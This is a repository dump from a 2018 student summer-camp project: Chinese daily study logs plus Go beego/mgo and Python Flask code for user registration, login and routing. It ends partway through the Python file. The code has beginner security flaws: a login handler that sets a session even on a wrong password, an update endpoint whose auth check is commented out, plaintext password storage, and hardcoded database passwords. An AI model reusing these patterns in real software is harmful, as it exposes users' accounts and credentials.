让我觉得非常好,我以往实践的很少,code的几乎都是算法,而这种做个小练手项目,跟着ddl跑的体验才是真正的收获,而不是具体的知识。\n\n今天早上10.00开始到现在4.30,我一直在纠结这个成员展示界面的小部分,时间耗在哪里了呢,可能只是为了一个简单功能,却搜索,尝试,辗转了很久发现不过是1个api就能解决的等等,花了很长时间,却是什么都没做,因为实践经历的匮乏,陷入各种坑,或者是学习顺序不对,等等。\n\n显然,不可能刚开始直接就找到最优路径,不过各种跳过的坑或许会加速我们的后面的学习,或者后面的路。\n\n想想,以我现在学过几天的视角来看,回过头,应该怎样学习\n\n1. go语言,快速过,但所有基础的知识都应该有印象 原因:既然准备用框架,那显然涉及到的语言细节不会那么多,有印象保证了你知道有你手里有什么功能可以使用\n\n2. 应该知道什么是自己的主力工具,既然决定了主力工具是框架beego,显然就应该去花一些时间去仔细的阅读他的文档,仔细的了解它的使用,本身学习东西应该是“整体要抓好,具体问题靠拆分然后分析或搜索解决”,这里的整体应该就是框架的整体使用和小项目的实现逻辑,这里自己深有体会,整体的准备工作没做好导致后面的问题太多了\n\n想说的很多,但是表达的却不多,抓好总体大概与脉络,具体问题拆分解决,说起来简单,做起来不擅长也不简单\n\n自己确实还是很菜啊,今天像是什么都没有做,这就是方式出了问题啊,这5天的经历给自己打击还是有的,感觉自己不仅菜,学东西也慢,还差的很远啊。\n\n## 学习内容\n\n没什么太多想说了\n" }, { "alpha_fraction": 0.654629647731781, "alphanum_fraction": 0.6564815044403076, "avg_line_length": 16.536584854125977, "blob_id": "2bd38a467840b19a33ed3e0e04cf15e641ec66eb", "content_id": "358fed6c342c4d688028743ff89b8f907ac4ba17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2224, "license_type": "no_license", "max_line_length": 56, "num_lines": 123, "path": "/Shixiaoyanger/market/controllers/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"fmt\"\n\t\"encoding/json\"\n\t\"market/models\"\n\t\"github.com/astaxie/beego\"\n\n\t\n)\n\ntype UserController struct {\n\tMainController\n}\n\n//注册:写入注册信息//1\nfunc (this *UserController) Register(){\t\n\n\tuser := models.User{}\n\terr :=json.Unmarshal(this.Ctx.Input.RequestBody,&user)\n\n\tif err != nil {\n\t\tbeego.Error(err)\n\t\tthis.RetError(errInputData)\n\t} \n\t \n\t ok,err1 := models.AddUser(&user)\n\t \n\tif ok != true{\n\t\tif err1 != nil {\n\t\t\tbeego.Error(err)\n\t\t\tthis.RetError(errDatabase1)\t\t\t\n\t\t} else{\n\t\t\tbeego.Error(err)\n\t\t\tthis.RetError(errDupUser)\n\t\t}\n\t}else{\n\t\tfmt.Println(\"jjjjjj\",user.Username,\"hhhhhhh\")\n\t\tuserstruct := UserStruct{\n\t\t\tUser: user,\n\t\t\tStatusCode: 
sucregist, \n \t\t}\n\t\tthis.Data[\"json\"] = userstruct\n \tthis.ServeJSON()\t\n\t}\n\t\n\tthis.TplName = \"review.html\"\n}\n\n\n//登录验证.\nfunc (this *UserController) Login(){\n\tvar user models.User\n\terr :=json.Unmarshal(this.Ctx.Input.RequestBody, &user)\n\tif err != nil {\n\t\tbeego.Error(err)\n\t}\n\n\tu := user.Username\n\tp := models.GetDes(user.Password)\n\n\tok,userInfo := models.FindbyUserame(u)\n\tif ok {\n\t\tif p == userInfo.Password {\n\t\t\tthis.Data[\"json\"] =\"登陆成功\"\n\t\t\t//设置session\t\n\t\t\tthis.SetSession(\"username\",user.Username)\n\t\t\t}else{\n\t\t\t\tthis.Data[\"json\"] =\"密码错误\"\n\t\t}\n\t}else{\n\t\t\tthis.Data[\"json\"] =\"账号不存在\"\t\n\t\t}\n\t\n\tthis.ServeJSON()\n\tthis.SetSession(\"username\",user.Username)\n\n\tthis.TplName = \"info.html\"\n}\n\n\n//退出注销.\nfunc (this *UserController) Logout(){\n\n\tthis.DelSession(\"username\")\n\n\tthis.TplName = \"regist.html\"\n}\n\n//\nfunc (this *UserController) Update(){\n\tuser := models.User{}\n\t/*\n\tfmt.Println(\"jjjjjj\",user.Username,\"hhhddhhhh\")\n\tv := this.GetSession(\"username\")\n\tfmt.Println(\"jjjdjjj\",user.Username,\"hhhhhhh\")\n\tif v!= user.Username{\n\t\tthis.Data[\"json\"] = \"userinfo incorrect\"\n\t\tthis.ServeJSON()\n\t\treturn\n\t}\n\t*/\n\terr := json.Unmarshal(this.Ctx.Input.RequestBody,&user)\n\tfmt.Println(\"jjjjjj\",user.Username,\"hhhhhhh\")\n\tif err != nil{\n\t\tbeego.Error(err)\n\t}\n\terr = models.UpdateUser(&user)\n\tif err !=nil{\n\t\tbeego.Error(err)\n\t}\n\n\t_,user = models.FindbyUserame(user.Username)\n\tmodels.IncreaseView(&user)\n\tthis.Data[\"json\"] = \"update success\"\n\tthis.ServeJSON()\n\n\n\n\t\n\n\tthis.TplName = \"regist.html\"\n}\n\n\n\n" }, { "alpha_fraction": 0.6010282635688782, "alphanum_fraction": 0.6154241561889648, "avg_line_length": 21.75438690185547, "blob_id": "23f96b5be599b722acccad0b7b0302b0743fd9ea", "content_id": "bfed05672a53ae756203cc0102aea36e5a504707", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Go", "length_bytes": 4156, "license_type": "no_license", "max_line_length": 86, "num_lines": 171, "path": "/yixiaoer/server/src/project1/model/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package model\n\nimport (\n\t\"gopkg.in/mgo.v2/bson\"\n\t\"gopkg.in/mgo.v2\"\n\t//\"project/controller\"不可以循环导包\n)\n\ntype User struct {\n\tId string `json:\"id\" form:\"id\"query:\"id\"`\n\tPassword string `json:\"password\" form:\"password\"query:\"password\"`\n\tEmail string `json:\"email\" form:\"email\" query:\"email\"`\n\tPhone string `json:\"phone\" form:\"phone\" query:\"phone\"`\n\tName string `json:\"name\" form:\"name\" query:\"name\"`\n\tGroup string `json:\"group\" form:\"group\" query:\"group\"`\n\tIdentity string `json:\"identity\" form:\"identity\" query:\"identity\"`\n\tStatus string `json:\"status\" form:\"status\" query:\"status\"`\n}\n\nfunc Login(u map[string]string) int8 {\n\tvar i int8\n\tif u [\"name\"]!= \"\" && u[\"password\"]!=\"\" {\n\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\t\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\t\tc := session.DB(\"test\").C(\"people\")\n\n\t\tvar user1 User\n\t\tvar user2 User\n\t\tc.Find(bson.M{\"name\": u[\"name\"]}).One(&user1) //id由数据库分配,不方便登陆,用name登陆\n\t\tif user1.Name != \"\" { //查找是否存在这个name的用户\n\t\t\tc.Find(bson.M{\"name\": u[\"name\"],\n\t\t\t\t\"password\": u[\"password\"]}).One(&user2)\n\t\t\tif user2.Name != \"\" {\n\t\t\t\ti = 0 //若存在查找是否这个name的用户pw也一致\n\t\t\t} else if user2.Name == \"\" {\n\t\t\t\ti = 1 //密码错误\n\t\t\t}\n\t\t} else if user1.Name == \"\" {\n\t\t\ti = 2 //没有这个name的用户\n\t\t}\n\n\n\n\n\t} else {\n\t\ti = 2\n\t}\n\treturn i\n}\n\nfunc SignUp(u map[string]string) int8 {\n\tvar i int8\n\tprintln(u)\n\tif u[\"password\"] != \"\" && u[\"name\"] != \"\" && u[\"phone\"] != \"\" && u[\"identity\"]!=\"\" {\n\n\t\tsession, err := 
mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\t\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\t\tc := session.DB(\"test\").C(\"people\")\n\n\t\tvar user User\n\t\tc.Find(bson.M{\"name\": u[\"name\"]}).One(&user)\n\t\tif user.Name ==\"\" {\n\t\t\tc.Insert(&u)\n\t\t\ti = 0 //数据库中之前不存在这个name,可以注册\n\t\t} else {\n\t\t\ti = 1 //数据库中已有这个name\n\t\t}\n\t} else {\n\t\ti = 2 //数据不完整\n\t}\n\treturn i\n}\n\nfunc DeleteMember(u map[string]string) {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\tc := session.DB(\"test\").C(\"people\")\n\n\tc.Remove(bson.M{\"name\": u[\"name\"]})\n}\n\nfunc ShowGroup(u map[string]string) []User {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\tsession.SetMode(mgo.Monotonic, true) //连接数据库\n\n\tc := session.DB(\"test\").C(\"people\")\n\n\tvar users []User //用切片来存放所有查询结果\n\tc.Find(bson.M{\"group\": u[\"group\"]}).All(&users)\n\treturn users\n}\n\nfunc GetInformation(u map[string]string) []User {\n\tvar users []User //用切片来存放所有查询结果\n\tif u[\"information\"] == \"yes\" {\n\t\tsession, err := mgo.Dial(\"localhost:27017\")\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer session.Close()\n\n\t\t// Optional. Switch the session to a monotonic behavior.\n\t\tsession.SetMode(mgo.Monotonic, true)\n\t\tc := session.DB(\"test\").C(\"people\")\n\n\n\t\tc.Find(bson.M{\"identity\": \"member\"}).All(&users)\n\t}\n\treturn users\n}\n\nfunc AddGroup(u map[string]string) {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\n\t// Optional. 
Switch the session to a monotonic behavior.\n\tsession.SetMode(mgo.Monotonic, true)\n\tc := session.DB(\"test\").C(\"people\")\n\n\tselector := bson.M{\"name\": u[\"name\"]}\n\tdata := bson.M{\"$set\": bson.M{\"group\": u[\"group\"]}}\n\tc.Update(selector, data)\n}\n\nfunc ChangeInformation(u map[string]string) {\n\tsession, err := mgo.Dial(\"localhost:27017\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\n\t// Optional. Switch the session to a monotonic behavior.\n\tsession.SetMode(mgo.Monotonic, true)\n\tc := session.DB(\"test\").C(\"people\")\n\n\tselector := bson.M{\"name\": u[\"name\"]}\n\tdata := bson.M{\n\t\t\"id\": u[\"id\"],\n\t\t\"password\": u[\"password\"],\n\t\t\"email\": u[\"email\"],\n\t\t\"phone\": u[\"phone\"],\n\t\t\"name\": u[\"name\"],\n\t\t\"group\": u[\"group\"],\n\t\t\"identity\": u[\"identity\"],\n\t\t\"status\": u[\"status\"],\n\t}\n\tc.Update(selector, data)\n}" }, { "alpha_fraction": 0.7230769395828247, "alphanum_fraction": 0.7487179636955261, "avg_line_length": 10.529411315917969, "blob_id": "035615b3ea488d751234b67aa1d8164def6d98a3", "content_id": "55166bf25446c9dbfc734deca87b98fe5d99f289", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 475, "license_type": "no_license", "max_line_length": 44, "num_lines": 17, "path": "/Shixiaoyanger/日报/7.17.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.18日报\n\n今天起晚了。。。\n\n下午\n\n1.把热身项目全部重构完成、\n\n2.为正式项目做准备\n\n- 进一步了解前后端交互的的原理,看了好多博客\n\n- 重新看了下beego的路由部分,搞懂了正则路由,自动匹配路由,还有一些快捷的匹配方法\n\n- 总体规划 项目的组成,将项目中的逻辑关系理清,重写了一下项目要求,设计好部分接口,\n\n 设计好user和goods的数据类别。" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.739130437374115, "avg_line_length": 7, "blob_id": "4294486f5672e26d1951a2f6333895306e0d646c", "content_id": "e04a25be6f3356246866cad3b9bc744ddd805c96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, 
"license_type": "no_license", "max_line_length": 15, "num_lines": 3, "path": "/Old-Li883/日报/7.16.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.16\n\n思考网络商城布局,定义相关函数" }, { "alpha_fraction": 0.7492537498474121, "alphanum_fraction": 0.762686550617218, "avg_line_length": 26.95833396911621, "blob_id": "40c4d989262914cc03f6383a005c77da57eb4246", "content_id": "ac405ed7424fcfbc018af0227bb18971a3e25e09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 870, "license_type": "no_license", "max_line_length": 98, "num_lines": 24, "path": "/jackwener/server/练手/models/models.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package models\n\nimport(\n\t\"hello/models/class\" // 注册模型,需要引入该包\n\t\"github.com/astaxie/beego/orm\"\n\t_ \"github.com/go-sql-driver/mysql\"\n)\n\n/*\n使用orm连接数据库步骤:\n//告诉orm使用哪一种数据库\n1.注册数据库驱动RegisterDriver(driverName, DriverType)\n2.注册数据库RegisterDataBase(aliasName, driverName, dataSource, params ...)\n3.注册对象模型RegisterModel(models ...)\n4.开启同步RunSyncdb(name string, force bool, verbose bool)\n*/\n\n// 在init函数中连接数据库,当导入该包的时候便执行此函数\nfunc Init(){\n\torm.RegisterDriver(\"mysql\", orm.DRMySQL)\n\torm.RegisterDataBase(\"default\", \"mysql\", \"root:jakevin@tcp(localhost:3306)/project?charset=utf8\")\n\torm.RegisterModel(new(class.User)) // 注册模型,建立User类型对象,注册模型时,需要引入包\n\torm.RunSyncdb(\"default\", false, true)\n}" }, { "alpha_fraction": 0.8391608595848083, "alphanum_fraction": 0.8601398468017578, "avg_line_length": 27.600000381469727, "blob_id": "81b1e6acf35462512eb1b825542d59b9294a285a", "content_id": "f96c491e0f51251464b9a3dd103368300cc4d129", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 399, "license_type": "no_license", "max_line_length": 101, "num_lines": 5, "path": "/jackwener/日报/7.17.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": 
"# 7.17日报\n\n把练手中能用到项目中的简单部分写了,如登录注册展示....\n\n在这个过程中注意到了数据库操作的重要性,事实上,练手项目中设计到数据库的部分不多,这次的很多地方要求提高了很多,当时看东西的时候很多东西学的懵懵懂懂的,现在有必要回去看一次,以及去搜索自行拓展一些内容。\n" }, { "alpha_fraction": 0.7886179089546204, "alphanum_fraction": 0.8130081295967102, "avg_line_length": 16.714284896850586, "blob_id": "d8c7645673ca1607dee031f07f131447c2bae6b3", "content_id": "48daed0dc9287cb38fb4f6c18b5edb2f08c6a632", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 345, "license_type": "no_license", "max_line_length": 75, "num_lines": 7, "path": "/Old-Li883/日报/7.18.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.18\n\n今天就是疯狂码代码,还算顺利,可以说算基本完成了吧,也可以说没完成,还差一个简陋的“猜你喜欢”功能的函数,现在的思路有点乱,想法有挺多,但总感觉不对。\n\n明日任务\n\n先测试代码,今天只是写完但没测,晚上的话争取完成“猜你喜欢”功能" }, { "alpha_fraction": 0.6978461742401123, "alphanum_fraction": 0.6996923089027405, "avg_line_length": 38.63414764404297, "blob_id": "0485f4466cb7f0e6095eb390e9fbaf6c2d8ef6ee", "content_id": "21f9d7f0929769d347a5c4a1b4bdadc39f2d409a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1637, "license_type": "no_license", "max_line_length": 95, "num_lines": 41, "path": "/Shixiaoyanger/market/routers/router.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"market/controllers\"\n\n\t\"github.com/astaxie/beego\"\n\t\n)\n\n//注册路由\nfunc init() {\n\tbeego.Router(\"/\", &controllers.MainController{})\n\tns := beego.NewNamespace(\"/v1\",\n\tbeego.NSNamespace(\"/users\",\n\t\tbeego.NSRouter(\"/register\", &controllers.UserController{}, \"post:Register\"),\n\t\tbeego.NSRouter(\"/login\", &controllers.UserController{}, \"post:Login\"),\n\t\tbeego.NSRouter(\"/logout\", &controllers.UserController{}, \"post:Logout\"),\n\t\tbeego.NSRouter(\"/update\", &controllers.UserController{}, \"post:Update\"),//update 
info\n\t//\tbeego.NSRouter(\"/info\",&controllers.UserController{},\"get:info\"),\n\n\n\n\t//\tbeego.NSRouter(\"/passwd\", &controllers.UserController{}, \"post:Passwd\"),\n\t//头像\n\t//\tbeego.NSRouter(\"/uploads\", &controllers.UserController{}, \"post:Uploads\"),\n\t//\tbeego.NSRouter(\"/downloads\", &controllers.UserController{}, \"get:Downloads\"),\n\t),\n\tbeego.NSNamespace(\"/goods\",\n//\t\tbeego.NSRouter(\"/:id\", &controllers.GoodsController{}, \"get:GetOne;put:Put;delete:Delete\"),\n//\t\tbeego.NSRouter(\"/\", &controllers.GoodsController{}, \"get:GetAll;post:Post\"),\n//\t\tbeego.NSRouter(\"/auth\", &controllers.GoodsController{}, \"post:Auth\"),\n\t\tbeego.NSRouter(\"/test\", &controllers.GoodsController{}, \"get:Test\"),\n\t\tbeego.NSRouter(\"/view/:id([0-9]+)\", &controllers.GoodsController{}, \"get:View\"),\n\t\tbeego.NSRouter(\"/view/popular\", &controllers.GoodsController{}, \"get:Popular\"),\n\t\tbeego.NSRouter(\"/view/latest\", &controllers.GoodsController{}, \"get:Latest\"),\n\t\tbeego.NSRouter(\"/add\", &controllers.GoodsController{}, \"post:Add\"),\n\t\tbeego.NSRouter(\"/search\", &controllers.GoodsController{}, \"post:Search\"),\n\t), \n)\nbeego.AddNamespace(ns)\n}\n" }, { "alpha_fraction": 0.6451612710952759, "alphanum_fraction": 0.6659132838249207, "avg_line_length": 31.446666717529297, "blob_id": "34cdeb2d21cd81aa4d7d947506d871e8c6860fc7", "content_id": "454afa647434d786f19232b4dc60d2b319fcc00a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9211, "license_type": "no_license", "max_line_length": 135, "num_lines": 150, "path": "/yixiaoer/日报/7.9.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.9周报\n\n## 今日计划\n1. 语言(Go)的学习\n2. 
前端方面的学习\n\n## 完成情况\n 结合*Go Web*进行了解学习\n### **Web服务器的工作原理**简单归纳为:\n> 客户机通过TCP/IP协议建立到服务器的TCP连接\n> 客户端向服务器发送HTTP协议请求包,请求服务器里的资源文档\n> 服务器向客户机发送HTTP协议应答包,如果请求的资源包含有动态语言的内容,那么服务器会调用动态语言的解释引擎负责处理“动态内容”,并将处理得到的数据返回给客户端\n> 客户机与服务器断开。由客户端解释HTML文档,在客户端屏幕上渲染图形结果\n\n\n### 关于**http**\n1. 三个点\n> HTTP是无连接:即限制每次连接只处理一个请求,服务器处理完客户的请求,并收到客户的应答后,就断开连接,采用这种方式可节省传输时间\n> HTTP是媒体独立的:只要客户端和服务器知道如何处理的数据内容,任何类型的数据都可以通过HTTP发送,客户端以及服务器指定使用适合的MIME-type内容类型\n> HTTP是无状态:指协议对于事务处理没有记忆能力,缺少状态意味着如果后续处理需要前面的信息,则必须重传,这样可能导致每次连接传送的数据量增大;另一方面,在服务器不需要先前信息时它的应答就较快\n\n2. http消息结构\n* > (客户端请求消息 浏览器信息)客户端发送一个HTTP请求到服务器的请求消息包括以下格式:请求行(request line)、请求头部(header)、空行和请求数据(主体部分)四个部分组成\n ```\n GET /domains/example/ HTTP/1.1 //请求行: 请求方法 请求URI HTTP协议/协议版本\n Host:www.iana.org //服务端的主机名\n User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 //浏览器信息\n Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 //客户端能接收的mine\n Accept-Encoding:gzip,deflate,sdch //是否支持流压缩\n Accept-Charset:UTF-8,*;q=0.5 //客户端字符编码集\n //空行,用于分割请求头和消息体\n //消息体,请求资源参数,例如POST传递的参数\n ```\n * http请求方法\n > 最基本的有4种,即GET、POST、PUT、DELETE\n > 一个URL地址用于描述一个网络上的资源,而HTTP中的GET、POST、 PUT、 DELETE就对应着对这个资源的查,改,增,删4个\n > 最常见的就是GET和POST,GET一般用于获取/查询资源信息,而POST一般用于更新资源信息\n* > (服务器响应消息 服务器信息)\n ```\n HTTP/1.1 200 OK //状态行\n Server: nginx/1.0.8 //服务器使用的WEB软件名及版本\n Date:Date: Tue, 30 Oct 2012 04:14:25 GMT //发送时间\n Content-Type: text/html //服务器发送信息的类型\n Transfer-Encoding: chunked //表示发送HTTP包是分段发的\n Connection: keep-alive //保持连接状态\n Content-Length: 90 //主体内容长度\n //空行 用来分割消息头和主体\n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"... //消息体\n ```\n * http状态码(三位数字组成,第一个数字定义了响应的类别)\n > 1XX 提示信息 - 表示请求已被成功接收,继续处理\n > 2XX 成功 - 表示请求已被成功接收,理解,接受\n > 3XX 重定向 - 要完成请求必须进行更进一步的处理\n > 4XX 客户端错误 - 请求有语法错误或请求无法实现\n > 5XX 服务器端错误 - 服务器未能实现合法的请求\n 常用:200(表示正常信息),302(表示跳转),301(资源(网页等)被永久转移到其它URL),404(请求的资源(网页等)不存在,500(内部服务器错误)\n\n3. 
“net/http”包(???感觉对于go的http包还是不太清楚...)\n (好了,不管了OTZ\n\n\n### 关于**HTML**\n1. HyperText Markup Language,超文本标记语言\n* 一种用于创建网页的标准标记语言(并非编程语言),是一套标机标签,用来描述网页\n* HTML文档包含了HTML标签及文本内容,也叫web页面\n* HTML标签(HTML tag),由尖括号围成的关键词,尽量小写,通常**成对**出现(eg.<b>和</b>,第一个是开始标签,第二个是结束标签);“HTML元素”和“HTML标签通常是描述一个意思,但严格说来元素包含了那一对标签\n* HTML属性通常以名称-值对的形式出现,可以在元素中添加附加信息,除属性值本身就含有双引号的情况下用单引号外,通常情况下属性值包括于双引号内,且尽量小写\n* for example:\n > <!DOCTYPE html> 声明为 HTML5 文档,不区分大小写\n > <html> 元素是 HTML 页面的根元素\n > <head> 元素包含了文档的元(meta)数据(如 <meta charset=\"utf-8\"> 定义网页编码格式为 utf-8)\n > <title> 元素描述了文档的标题\n > <body> 元素包含了可见的页面内容\n > <h1> 元素定义一个大标题\n > <p> 元素定义一个段落\n* 关于<head>元素,其中你可以插入脚本(scripts),样式文件(CSS),及各种meta信息,可以添加在头部区域的元素标签为: <title>, <style>, <meta>, <link>, <script>, <noscript>, and <base>\n * *<title> 元素*是必须的,它定义了浏览器工具栏的标题;当网页添加到收藏夹时,显示在收藏夹中的标题;显示在搜索引擎结果页面的标题\n * *<style>标签*定义了HTML文档的样式文件引用地址,也可以直接添加样式来渲染 HTML 文档\n * *<meta> 标签*通常用于指定网页的描述、关键词、文件的最后修改时间、作者、其他元数据,可以使用于浏览器(如何显示内容或重新加载页面),搜索引擎(关键词),或其他Web服务\n * *<link> 标签*定义了文档与外部资源之间的关系,通常用于链接到样式表\n * *<script>标签*用于加载脚本文件\n * *<base> 标签*描述了基本的链接地址/链接目标,该标签作为HTML文档中所有的链接标签的默认链接\n\n2. 几种定义\n* HTML标题(只用于标题,不要仅仅是为了生成粗体或大号的文本而使用标题)\n 通过<h1> - <h6> 来定义\n p.s. HTML水平线 <hr>\n p.p.s. HTML注释 <!--这是一个注释,在界面并不会显示-->\n* HTML段落通过<p>来定义\n p.s. HTML换行 <br> (没有成对出现的另一个)\n p.p.s 无法通过在 HTML 代码中添加额外的空格或换行来改变输出的效果\n* HTML链接通过<a>来定义\n ```\n <a href=\"url\">链接文本</a>\n ```\n p.s. 在“url”后使用 target 属性,可以定义被链接的文档在何处显示(\"_blank\"则连接在新窗口打开)\n p.p.s. id属性,可用于创建一个HTML文档书签标记\n ```\n * <a id=\"tips\">有用的提示部分</a> <!--在html文档中插入ID-->\n * <a href=\"#tips\">访问有用的提示部分</a> <!--在HTML文档中创建一个链接到\"有用的提示部分(id=\"tips\")\"-->\n * <a href=\"http://www.runoob.com/html/html-links.html#tips\">访问有用的提示部分</a> <!--从另一个页面创建一个链接到\"有用的提示部分(id=\"tips\")-->\n ```\n\n3. 表格\n* 由<table>标签来定义,每个表格均有若干行(由<tr>标签定义),每行被分割为若干单元格(由<td>标签定义,字母td指表格数据(table data),即数据单元格的内容),表头由<tr>标签进行定义\n* 若不定义边框属性,表格将不显示边框\n\n4. 
列表\n* 无序列表是一个项目的列表,此列项目使用粗体圆点(典型的小黑圆圈)进行标记,使用 <ul> 标签\n* 有序列表也是一列项目,列表项目(整个列表)始于 <ol> 标签,用数字来标记且每个列表(项数字后的那一项)始于 <li> 标签,使用数字来标记\n\n5. 区块\n* 大多数 HTML 元素被定义为块级元素或内联元素,块级元素在浏览器显示时,通常会以新行来开始(和结束)(eg.<h1>, <p>, <ul>, <table>)\n\n6. 布局\n* <div>\n* <span>\n\n7. 表单(方便地进行客户端和服务器数据的交互)\n * 表单是一个包含表单元素(允许用户在表单中(比如:文本域、下拉列表、单选框、复选框等等)输入信息的元素)的区域,使用表单标签(\\)定义\n ```\n <form>\n ...\n input 元素\n ...\n </form>\n ```\n \n \n### 关于**CSS**\n* 指定文档(信息的集合)该如何呈现给用户的语言文档,是一门标记语言\n* CSS声明总是以分号(;)结束,声明组以大括号({})括起来,为使可读性更强,可以一行一个属性\n* 注解用\"/* \",\" */\"\n*(未完待续...)\n\n\n### 关于前后端分离\n* 路由(就像由URL到具体页面的一个映射,一个方法)\n* 端口(类似一一对应,来实现)\n* 用hmtl将前端大概布局,再<script>传送到js,再将前端数据发给后端,然后再进行处理;从后端传出,并将后端连接数据库(可以先明文存储密码,加密再说...)\n\n\nto be continued...\n明日继续...\n\n\n## 学习计划\n1. CSS/javascript\n2. 数据库(mango)\n3. 框架(试试echo叭)\n" }, { "alpha_fraction": 0.6750629544258118, "alphanum_fraction": 0.6750629544258118, "avg_line_length": 14.192307472229004, "blob_id": "3ad9a9c64b86ddd839bd65419398161dd4da8391", "content_id": "f4f80dae96aaa44c48dca55b62755b60ff2a8159", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 407, "license_type": "no_license", "max_line_length": 49, "num_lines": 26, "path": "/Shixiaoyanger/market/main.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t_ \"market/routers\"\n\t\"market/models\"\n\n\t\n\n\t\"github.com/astaxie/beego\"\n\t\"github.com/astaxie/beego/orm\"\n\t_ \"github.com/go-sql-driver/mysql\"\n)\nfunc init() {\n\t// 注册数据库\n\tmodels.RegisterDB() \n}\nfunc main() {\n\n\torm.Debug = true\n\tbeego.BConfig.WebConfig.Session.SessionOn = true\n//\tbeego.SetStaticPath(\"/static\",\"static\")\n\torm.RunSyncdb(\"default\", false, true) \n\t\n\tbeego.Run()\n\n}\n\n " }, { "alpha_fraction": 0.728863000869751, "alphanum_fraction": 0.728863000869751, "avg_line_length": 27.66666603088379, "blob_id": "b18c5a17ec7497144118e89d914c296ccfa5a077", "content_id": 
"f43f1ab5ee3c6de2ba052036ae0cbab2b133c49e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 343, "license_type": "no_license", "max_line_length": 90, "num_lines": 12, "path": "/jackwener/server/mall/routers/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"mall/controllers\"\n\t\"github.com/astaxie/beego\"\n)\n\nfunc init() {\n\tbeego.Router(\"/api/person\", &controllers.MainController{}, \"post:Login\")\n\tbeego.Router(\"/api/person/register\", &controllers.MainController{}, \"post:Register\")\n\tbeego.Router(\"/api/person/:user\", &controllers.MainController{}, \"get:Person;post:Login\")\n}" }, { "alpha_fraction": 0.5260653495788574, "alphanum_fraction": 0.5337194800376892, "avg_line_length": 29.402515411376953, "blob_id": "42707c2cf9be594a0511ea95749f189e3fd078b1", "content_id": "0e05a44048b3e8fa80c2194caef9c6759a5993b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4940, "license_type": "no_license", "max_line_length": 102, "num_lines": 159, "path": "/Old-Li883/热身任务代码/member2/model/member_operation.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import make_response\nimport json\nimport pymysql\n\ndb = pymysql.connect(\n host=\"127.0.0.1\", user=\"root\", db=\"member\", passwd=',lch980929')\ncursor = db.cursor()\n\n\ndef mem_login(id, password):\n cursor.execute(\"select password from mem_info where id=%s\", id)\n accurate_pwd = cursor.fetchone()\n if accurate_pwd:\n if accurate_pwd[0] == password:\n rsp = make_response('hello')\n rsp.set_cookie('id', id) # 返回登录者id\n cursor.execute(\"select status from mem_info where id=%s\", id)\n now_status = cursor.fetchone()\n if now_status[0] == 1 and now_status[0] != 0: # 普通用户登录\n cursor.execute(\"update mem_info set status=3 where id=%s\", id)\n elif now_status[0] == 2 and now_status[0] != 
